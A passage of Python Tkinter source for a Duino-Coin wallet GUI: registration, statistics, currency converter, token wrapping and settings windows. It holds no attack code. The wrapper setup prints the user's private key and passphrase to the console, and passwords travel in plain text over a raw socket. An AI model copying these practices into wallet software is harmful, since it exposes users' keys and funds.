image=duco)
ducoLabel.grid(
row=0,
padx=5,
pady=(5, 0),
sticky="nswe")
ducoLabel2 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("register_on_network"),
font=TEXT_FONT_BOLD)
ducoLabel2.grid(row=1,
padx=5,
sticky="nswe")
def colorLabelBlue(handler):
ducoLabel3.configure(foreground="#6c5ce7")
def colorLabelNormal(handler):
ducoLabel3.configure(foreground=FONT_COLOR)
ducoLabel3 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=tos_warning,
font=TEXT_FONT)
ducoLabel3.grid(
row=2,
padx=5,
sticky="nswe")
ducoLabel3.bind("<Button-1>", openTos)
ducoLabel3.bind("<Enter>", colorLabelBlue)
ducoLabel3.bind("<Leave>", colorLabelNormal)
Label(
register,
text=get_string("username").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=3,
sticky=W,
padx=5,
pady=(5, 0))
username = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
username.grid(
row=4,
padx=5)
Label(
register,
text=get_string("passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=5,
sticky=W,
padx=5)
password = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
password.grid(
row=6,
padx=5)
Label(
register,
text=get_string("confirm_passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=7,
sticky=W,
padx=5)
confpassword = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
confpassword.grid(
row=8,
padx=5)
Label(
register,
text=get_string("email").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=9,
sticky=W,
padx=5)
email = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
email.grid(
row=10,
padx=5)
self.logbtn = Button(
register,
text=get_string("register"),
activebackground=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
command=self._registerprotocol,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5, 5),
pady=(5, 5))
register.configure(background=BACKGROUND_COLOR)
def loading_window():
global loading, status
loading = Tk()
loading.resizable(False, False)
loading.configure(background=BACKGROUND_COLOR)
loading.title(get_string("loading"))
try:
loading.iconphoto(True,
PhotoImage(file=resources + "duco_color.png"))
except Exception:
pass
TEXT_FONT = Font(loading,
size=10,
weight="bold")
TEXT_FONT_BOLD = Font(loading,
size=14,
weight="bold")
original = Image.open(resources + "duco_color.png")
resized = original.resize((128, 128), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(loading,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(row=0,
column=0,
sticky=N + S + E + W,
pady=(5, 0),
padx=(5))
Label(
loading,
text=get_string("duino_coin_wallet"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=1,
column=0,
sticky=S + W,
pady=(5, 0),
padx=5)
loading.update()
status = Label(
loading,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("loading_database"),
font=TEXT_FONT)
status.grid(
row=2,
column=0,
sticky=S + W,
pady=(0, 5),
padx=5)
loading.update()
def transactions_window(handler):
transactionsWindow = Toplevel()
transactionsWindow.resizable(False, False)
transactionsWindow.title(get_string("wallet_transactions"))
transactionsWindow.transient([root])
transactionsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
transactionsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
transactionsWindow,
size=12,
weight="normal")
Label(
transactionsWindow,
text=get_string("transaction_list"),
font=TEXT_FONT_BOLD_LARGE,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
Label(
transactionsWindow,
text=get_string("transaction_list_notice"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
listbox = Listbox(
transactionsWindow,
width="35",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
listbox.grid(
row=2,
column=0,
sticky=S + W + N + E,
padx=(5, 0),
pady=(0, 5))
scrollbar = Scrollbar(transactionsWindow,
background=BACKGROUND_COLOR)
scrollbar.grid(
row=2,
column=1,
sticky=N + S,
padx=(0, 5),
pady=(0, 5))
for i in gtxl:
listbox.insert(END, gtxl[i]["Sender"] + " to " + gtxl[i]
["Recipient"] + ": " + str(gtxl[i]["Amount"]) + " DUCO")
def get_selection(event):
try:
selection = listbox.curselection()[0]
openTransaction(gtxl[str(selection)]["Hash"])
except IndexError:
pass
listbox.bind("<Button-1>", get_selection)
listbox.config(yscrollcommand=scrollbar.set, font=TEXT_FONT)
scrollbar.config(command=listbox.yview)
def currency_converter_calc():
fromcurrency = fromCurrencyInput.get(fromCurrencyInput.curselection())
tocurrency = toCurrencyInput.get(toCurrencyInput.curselection())
amount = amountInput.get()
# TODO
value = duco_fiat_value * float(amount)
result = get_string("result") + ": " + str(round(value, 6))
conversionresulttext.set(str(result))
calculatorWindow.update()
def currency_converter_window(handler):
global conversionresulttext
global fromCurrencyInput
global toCurrencyInput
global amountInput
global calculatorWindow
calculatorWindow = Toplevel()
calculatorWindow.resizable(False, False)
calculatorWindow.title(get_string("wallet_calculator"))
calculatorWindow.transient([root])
calculatorWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(
calculatorWindow,
size=12,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
calculatorWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
calculatorWindow,
size=12,
weight="normal")
Label(
calculatorWindow,
text=get_string("currency_converter"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
columnspan=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Label(
calculatorWindow,
text=get_string("from"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=0,
sticky=S + W,
padx=5)
fromCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
font=TEXT_FONT,
foreground=FONT_COLOR,
width="20",
height="13",
)
fromCurrencyInput.grid(row=2,
column=0,
sticky=S + W,
padx=(5, 0))
fromCurrencyInput.insert(0, "DUCO")
vsb = Scrollbar(
calculatorWindow,
orient="vertical",
command=fromCurrencyInput.yview,
background=BACKGROUND_COLOR,
)
vsb.grid(row=2,
column=1,
sticky="ns",
padx=(0, 5))
fromCurrencyInput.configure(yscrollcommand=vsb.set)
fromCurrencyInput.select_set(0)
fromCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("to"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=3,
columnspan=2,
sticky=S + W,
padx=5)
toCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
foreground=FONT_COLOR,
font=TEXT_FONT,
width="20",
height="13")
toCurrencyInput.grid(
row=2,
column=3,
sticky=S + W,
padx=(5, 0))
toCurrencyInput.insert(0, "USD")
vsb2 = Scrollbar(
calculatorWindow,
orient="vertical",
command=toCurrencyInput.yview,
background=BACKGROUND_COLOR,)
vsb2.grid(
row=2,
column=4,
sticky="ns",
padx=(0, 5))
toCurrencyInput.configure(yscrollcommand=vsb2.set)
toCurrencyInput.select_set(0)
toCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("input_amount"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=3,
columnspan=2,
column=0,
sticky=S + W,
padx=5)
def clear_ccamount_placeholder(self):
amountInput.delete("0", "100")
amountInput = Entry(
calculatorWindow,
foreground=FOREGROUND_COLOR_SECONDARY,
border="0",
font=TEXT_FONT,
background=BACKGROUND_COLOR,)
amountInput.grid(
row=4,
column=0,
sticky=N + S + W + E,
padx=5,
columnspan=2,
pady=(0, 5))
amountInput.insert("0", str(global_balance))
amountInput.bind("<FocusIn>", clear_ccamount_placeholder)
Button(
calculatorWindow,
text=get_string("calculate"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
background=BACKGROUND_COLOR,
command=currency_converter_calc,
).grid(row=3,
columnspan=2,
column=2,
sticky=N + S + W + E,
pady=(5, 0),
padx=5)
conversionresulttext = StringVar(calculatorWindow)
conversionresulttext.set(get_string("result") + ": 0.0")
conversionresultLabel = Label(
calculatorWindow,
textvariable=conversionresulttext,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,)
conversionresultLabel.grid(
row=4,
columnspan=2,
column=2,
pady=(0, 5))
calculatorWindow.mainloop()
def statistics_window(handler):
statsApi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if statsApi.status_code == 200: # Check for reponse
statsApi = statsApi.json()
statsWindow = Toplevel()
statsWindow.resizable(False, False)
statsWindow.title(get_string("statistics_title"))
statsWindow.transient([root])
statsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
statsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
statsWindow,
size=12,
weight="normal")
Active_workers_listbox = Listbox(
statsWindow,
exportselection=False,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
border="0",
font=TEXT_FONT,
width="65",
height="8",)
Active_workers_listbox.grid(
row=1,
columnspan=2,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
i = 0
totalHashrate = 0
for threadid in statsApi["Miners"]:
if username in statsApi["Miners"][threadid]["User"]:
rigId = statsApi["Miners"][threadid]["Identifier"]
if rigId == "None":
rigId = ""
else:
rigId += ": "
software = statsApi["Miners"][threadid]["Software"]
hashrate = str(round(statsApi["Miners"][threadid]["Hashrate"], 2))
totalHashrate += float(hashrate)
difficulty = str(statsApi["Miners"][threadid]["Diff"])
shares = (
str(statsApi["Miners"][threadid]["Accepted"])
+ "/"
+ str(
statsApi["Miners"][threadid]["Accepted"]
+ statsApi["Miners"][threadid]["Rejected"]))
Active_workers_listbox.insert(
i,
"#"
+ str(i + 1)
+ ": "
+ rigId
+ software
+ " "
+ str(round(float(hashrate) / 1000, 2))
+ " kH/s @ diff "
+ difficulty
+ ", "
+ shares)
i += 1
if i == 0:
Active_workers_listbox.insert(
i, get_string("statistics_miner_warning"))
totalHashrateString = str(int(totalHashrate)) + " H/s"
if totalHashrate > 1000000000:
totalHashrateString = str(
round(totalHashrate / 1000000000, 2)) + " GH/s"
elif totalHashrate > 1000000:
totalHashrateString = str(round(totalHashrate / 1000000, 2)) + " MH/s"
elif totalHashrate > 1000:
totalHashrateString = str(round(totalHashrate / 1000, 2)) + " kH/s"
Active_workers_listbox.configure(height=i)
Active_workers_listbox.select_set(32)
Active_workers_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("your_miners") + " - " + totalHashrateString,
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=5,
padx=5)
Label(
statsWindow,
text=get_string("richlist"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Top_10_listbox = Listbox(
statsWindow,
exportselection=False,
border="0",
font=TEXT_FONT,
width="30",
height="10",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
Top_10_listbox.grid(
row=3,
column=0,
rowspan=10,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
for i in statsApi["Top 10 richest miners"]:
Top_10_listbox.insert(i, statsApi["Top 10 richest miners"][i])
Top_10_listbox.select_set(32)
Top_10_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("network_info"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=2,
column=1,
sticky=S + W,
padx=5,
pady=5)
Label(
statsWindow,
text=get_string("difficulty")
+ ": "
+ str(statsApi["Current difficulty"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=3,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_blocks")
+ ": "
+ str(statsApi["Mined blocks"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("network_hashrate")
+ ": "
+ str(statsApi["Pool hashrate"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("active_miners")
+ ": "
+ str(len(statsApi["Miners"])),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text="1 DUCO "
+ get_string("estimated_price")
+ ": $"
+ str(statsApi["Duco price"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=7,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("registered_users")
+ ": "
+ str(statsApi["Registered users"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=8,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_duco")
+ ": "
+ str(statsApi["All-time mined DUCO"])
+ " ᕲ",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=9,
column=1,
sticky=S + W,
padx=5)
statsWindow.mainloop()
def wrapper_window(handler):
def Wrap():
amount = amountWrap.get()
print("Got amount: ", amount)
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
_ = soc.recv(10)
soc.send(
bytes(
"WRAP,"
+ str(amount)
+ ","
+ str(pub_key),
encoding="utf8"))
soc.close()
sleep(2)
wrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
pub_key = pubkeyfile.read()
pubkeyfile.close()
wrapperWindow = Toplevel()
wrapperWindow.resizable(False, False)
wrapperWindow.title(get_string("wrapper_title"))
wrapperWindow.transient([root])
askWrapAmount = Label(
wrapperWindow,
text=get_string("wrapper_amount_to_wrap") + ":")
askWrapAmount.grid(row=0,
column=0,
sticky=N + W)
amountWrap = Entry(wrapperWindow,
border="0",
font=Font(size=15))
amountWrap.grid(row=1,
column=0,
sticky=N + W)
wrapButton = Button(wrapperWindow,
text="Wrap",
command=Wrap)
wrapButton.grid(row=2,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error_tronpy"))
def unwrapper_window(handler):
def UnWrap():
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
passphrase = passphraseEntry.get()
privkeyfile = open(str(resources + "DUCOPrivKey.encrypt"), "r")
privKeyEnc = privkeyfile.read()
privkeyfile.close()
try:
priv_key = str(password_decrypt(privKeyEnc, passphrase))[2:66]
use_wrapper = True
except InvalidToken:
print(get_string("invalid_passphrase"))
use_wrapper = False
amount = amountUnWrap.get()
print("Got amount:", amount)
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv(10)
if use_wrapper:
pendingvalues = wduco.functions.pendingWithdrawals(
pub_key, username)
# transaction wasn't initiated, but variable should be declared
txn_success = False
try:
amount = float(amount)
except ValueError:
print("Value should be numeric - aborting")
else:
if int(float(amount) * 10 ** 6) >= pendingvalues:
toInit = int(float(amount) * 10 ** 6) - pendingvalues
else:
toInit = amount * 10 ** 6
if toInit > 0:
txn = (
wduco.functions.initiateWithdraw(username, toInit)
.with_owner(pub_key)
.fee_limit(5_000_000)
.build()
.sign(PrivateKey(bytes.fromhex(priv_key))))
txn = txn.broadcast()
txnfeedback = txn.result()
if txnfeedback:
txn_success = True
else:
txn_success = False
if txn_success or amount <= pendingvalues:
soc.send(
bytes(
"UNWRAP,"
+ str(amount)
+ ","
+ str(pub_key),
encoding="utf8"))
soc.close()
sleep(2)
unWrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pubkeyfile.read()
pubkeyfile.close()
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
unWrapperWindow = Toplevel()
unWrapperWindow.resizable(False, False)
unWrapperWindow.title(get_string("unwrapper_title"))
unWrapperWindow.transient([root])
unWrapperWindow.configure()
askAmount = Label(
unWrapperWindow,
text=get_string("unwrap_amount"))
askAmount.grid(row=1,
column=0,
sticky=N + W)
amountUnWrap = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
amountUnWrap.grid(row=2,
column=0,
sticky=N + W)
askPassphrase = Label(
unWrapperWindow,
text=get_string("ask_passphrase"))
askPassphrase.grid(row=4,
column=0,
sticky=N + W)
passphraseEntry = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
passphraseEntry.grid(
row=5,
column=0,
sticky=N + W)
wrapButton = Button(
unWrapperWindow,
text=get_string("unwrap_duco"),
command=UnWrap)
wrapButton.grid(
row=7,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def settings_window(handler):
def _wrapperconf():
if TRONPY_ENABLED:
privkey_input = StringVar()
passphrase_input = StringVar()
wrapconfWindow = Toplevel()
wrapconfWindow.resizable(False, False)
wrapconfWindow.title(get_string("wrapper_title"))
wrapconfWindow.transient([root])
wrapconfWindow.configure()
def setwrapper():
if privkey_input and passphrase_input:
priv_key = privkey_entry.get()
print("Got priv key:", priv_key)
passphrase = passphrase_entry.get()
print("Got passphrase:", passphrase)
try:
pub_key = PrivateKey(
bytes.fromhex(priv_key)
).public_key.to_base58check_address()
except Exception:
pass
else:
print("Saving data")
privkeyfile = open(
str(resources + "DUCOPrivKey.encrypt"), "w")
privkeyfile.write(
str(password_encrypt(
priv_key.encode(), passphrase
).decode()))
privkeyfile.close()
pubkeyfile = open(
str(resources + "DUCOPubKey.pub"), "w")
pubkeyfile.write(pub_key)
pubkeyfile.close()
Label(wrapconfWindow, text=get_string(
"wrapper_success")).pack()
wrapconfWindow.quit()
title = Label(
wrapconfWindow,
text=get_string("wrapper_config_title"),
font=Font(size=20))
title.grid(row=0,
column=0,
sticky=N + W,
padx=5)
askprivkey = Label(
wrapconfWindow,
text=get_string("ask_private_key"))
askprivkey.grid(row=1,
column=0,
sticky=N + W)
privkey_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=privkey_input)
privkey_entry.grid(row=2,
column=0,
sticky=N + W)
askpassphrase = Label(wrapconfWindow,
text=get_string("passphrase"))
askpassphrase.grid(row=3,
column=0,
sticky=N + W)
passphrase_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=passphrase_input)
passphrase_entry.grid(row=4,
column=0,
sticky=N + W)
wrapConfigButton = Button(
wrapconfWindow,
text=get_string("configure_wrapper_lowercase"),
command=setwrapper)
wrapConfigButton.grid(row=5,
column=0,
sticky=N + W)
wrapconfWindow.mainloop()
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def _logout():
try:
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
try:
execl(sys.executable, sys.executable, *sys.argv)
except Exception as e:
print(e)
def _cleartrs():
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM transactions")
con.commit()
def _chgpass():
def _changepassprotocol():
oldpasswordS = oldpassword.get()
newpasswordS = newpassword.get()
confpasswordS = confpassword.get()
if oldpasswordS != newpasswordS:
if oldpasswordS and newpasswordS and confpasswordS:
if newpasswordS == confpasswordS:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(
bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
soc.recv(2)
soc.send(
bytes(
"CHGP,"
+ str(oldpasswordS)
+ ","
+ str(newpasswordS),
encoding="utf8"))
response = soc.recv(128).decode(
"utf8").rstrip("\n").split(",")
soc.close()
if not "OK" in response[0]:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=response[1])
else:
messagebox.showinfo(
title=get_string("change_passwd_ok"),
message=response[1])
try:
try:
with sqlconn(
resources + "wallet.db"
) as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
except FileNotFoundError:
pass
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("fill_the_blanks_warning"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("same_passwd_error"))
settingsWindow.destroy()
changepassWindow = Toplevel()
changepassWindow.title(get_string("change_passwd_lowercase"))
changepassWindow.resizable(False, False)
changepassWindow.transient([root])
changepassWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(changepassWindow, size=12, weight="bold")
TEXT_FONT = Font(changepassWindow, size=12, weight="normal")
Label(
changepassWindow,
text=get_string("old_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=0,
sticky=W,
padx=5)
oldpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
oldpassword.grid(row=1,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=2,
sticky=W,
padx=5)
newpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
newpassword.grid(row=3,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("confirm_new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
sticky=W,
padx=5)
confpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
confpassword.grid(row=5,
sticky="nswe",
padx=5)
chgpbtn = Button(
changepassWindow,
text=get_string("change_passwd"),
command=_changepassprotocol,
foreground=FOREGROUND_COLOR,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
chgpbtn.grid(columnspan=2,
sticky="nswe",
pady=5,
padx=5)
settingsWindow = Toplevel()
settingsWindow.resizable(False, False)
settingsWindow.title(get_string("settings_title"))
settingsWindow.transient([root])
settingsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT = Font(
settingsWindow,
size=12,
weight="normal")
TEXT_FONT_BOLD_LARGE = Font(
settingsWindow,
size=12,
weight="bold")
Label(
settingsWindow,
text=get_string("uppercase_settings"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=4,
sticky=S + W,
pady=(5, 5),
padx=(5, 0))
logoutbtn = Button(
settingsWindow,
text=get_string("logout"),
command=_logout,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
logoutbtn.grid(row=1,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
chgpassbtn = Button(
settingsWindow,
text=get_string("change_passwd"),
command=_chgpass,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
chgpassbtn.grid(row=2,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
wrapperconfbtn = Button(
settingsWindow,
text=get_string("configure_wrapper"),
command=_wrapperconf,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
wrapperconfbtn.grid(row=3,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
cleartransbtn = Button(
settingsWindow,
text=get_string("clear_transactions"),
command=_cleartrs,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
cleartransbtn.grid(row=4,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=5,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
Label(
settingsWindow,
text=get_string("logged_in_as")
+ ": "
+ str(username),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=6,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("wallet_version")
+ ": "
+ str(VERSION),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=7,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("translation_author_message")
+ " "
+ get_string("translation_author"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=8,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("config_dev_warning"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=9,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=10,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
original = Image.open(resources + "duco.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
website = ImageTk.PhotoImage(resized)
website.image = website
websiteLabel = Label(
settingsWindow,
image=website,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
websiteLabel.grid(
row=11,
column=0,
sticky=N + S + E + W,
padx=(5, 0),
pady=(0, 5))
websiteLabel.bind("<Button-1>", openWebsite)
original = Image.open(resources + "github.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(
settingsWindow,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(
row=11,
column=1,
sticky=N + S + E + W,
pady=(0, 5))
githubLabel.bind("<Button-1>", openGitHub)
original = Image.open(resources + "exchange.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
exchange = ImageTk.PhotoImage(resized)
exchange.image = exchange
exchangeLabel = Label(
settingsWindow,
image=exchange,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
exchangeLabel.grid(
row=11,
column=2,
sticky=N + S + E + W,
pady=(0, 5))
exchangeLabel.bind("<Button-1>", openExchange)
original = Image.open(resources + "discord.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
discord = ImageTk.PhotoImage(resized)
discord.image = discord
discordLabel = Label(
settingsWindow,
image=discord,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
discordLabel.grid(
row=11,
column=3,
sticky=N + S + E + W,
padx=(0, 5),
pady=(0, 5))
discordLabel.bind("<Button-1>", openDiscord)
def get_balance():
global oldbalance
global balance
global unpaid_balance
global global_balance
global gtxl
try:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv(2)
soc.send(bytes(
"BALA",
encoding="utf8"))
oldbalance = balance
balance = float(soc.recv(64).decode().rstrip("\n"))
global_balance = round(float(balance), 8)
try:
gtxl = {}
soc.send(bytes(
"GTXL," + str(username) + ",7",
encoding="utf8"))
gtxl = str(soc.recv(8096).decode().rstrip(
"\n").replace("\'", "\""))
gtxl = jsonloads(gtxl)
except Exception as e:
print("Error getting transaction list: " + str(e))
if oldbalance != balance:
difference = float(balance) - float(oldbalance)
dif_with_unpaid = (
float(balance) - float(oldbalance)) + unpaid_balance
if float(balance) != float(difference):
